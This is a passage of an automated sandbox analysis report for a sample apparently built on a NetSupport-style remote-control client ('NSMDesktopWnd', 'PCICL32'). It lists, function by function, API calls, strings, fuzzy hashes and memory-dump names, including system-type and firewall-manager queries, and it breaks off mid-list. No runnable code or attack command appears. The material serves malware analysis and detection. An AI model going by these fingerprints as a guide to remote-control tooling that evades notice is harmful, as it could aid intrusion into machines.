                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                      • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                      • API String ID: 2851125068-2390547818
                                                                                                      • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                                      • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                                      • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                                      • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                                      APIs
                                                                                                      • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101733C
                                                                                                      • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                                      • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                                      • CoUninitialize.COMBASE ref: 110173D0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                      • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                      • API String ID: 2407233060-578995875
                                                                                                      • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                                      • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                                      • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                                      • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                                      APIs
                                                                                                      • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017252
                                                                                                      • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                                      • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                                      • CoUninitialize.COMBASE ref: 110172E0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                      • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                      • API String ID: 2407233060-2037925671
                                                                                                      • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                                      • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                                      • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                                      • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
                                                                                                      • AutoICFConfig, xrefs: 11138700
                                                                                                      • Client, xrefs: 11138705
                                                                                                      • DoICFConfig() OK, xrefs: 11138786
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountTick
                                                                                                      • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                      • API String ID: 536389180-1512301160
                                                                                                      • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                                      • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                                      • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                                      • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                                      APIs
                                                                                                      • send.WSOCK32(?,?,?,00000000), ref: 6C759C93
                                                                                                      • timeGetTime.WINMM(?,?,?,00000000), ref: 6C759CD0
                                                                                                      • Sleep.KERNEL32(00000000), ref: 6C759CDE
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C759D4F
                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 6C759D72
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                      • String ID: 3'
                                                                                                      • API String ID: 77915721-280543908
                                                                                                      • Opcode ID: 7f83c1a3c8a71359bac494a3a5e14b54d21fb09306630ac09f541c9e9722c2a3
                                                                                                      • Instruction ID: 20f61ebe5c92a2c72ba6942fd40a7310756676507d9125fe055646238aa56151
                                                                                                      • Opcode Fuzzy Hash: 7f83c1a3c8a71359bac494a3a5e14b54d21fb09306630ac09f541c9e9722c2a3
                                                                                                      • Instruction Fuzzy Hash: EC21A1B1A042188FDF20CF24CE89B9AB3B4AF15314F5542D5D90D97641CB34ED96CF91
                                                                                                      APIs
                                                                                                      • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                                      • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                                      • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                      • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                      • API String ID: 3222248624-258972079
                                                                                                      • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                                      • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                                      • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                                      • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                                      • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                                      • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                      • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                      • API String ID: 4186647306-532032230
                                                                                                      • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                                      • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                                      • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                                      • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                                      APIs
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                                      • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                                      • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                      • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                      • API String ID: 3360349984-1136101629
                                                                                                      • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                                      • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                                      • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                                      • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: wsprintf
                                                                                                      • String ID: %s%s%s.bin$849224$_HF$_HW$_SW
                                                                                                      • API String ID: 2111968516-1870900684
                                                                                                      • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                                      • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                                      • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                                      • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                                      APIs
                                                                                                      • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                                      • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                                      • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                                      • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                      • String ID: NSMDesktopWnd
                                                                                                      • API String ID: 2669163067-206650970
                                                                                                      • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                                      • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                                      • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                                      • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                                      APIs
                                                                                                      • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                                      • KillTimer.USER32(00000000,00007F60,TermUI...), ref: 1113CCB3
                                                                                                      • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113CD2B
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeKillLibraryTimer
                                                                                                      • String ID: TermUI
                                                                                                      • API String ID: 2006562601-4085834059
                                                                                                      • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                                      • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                                      • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                                      • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
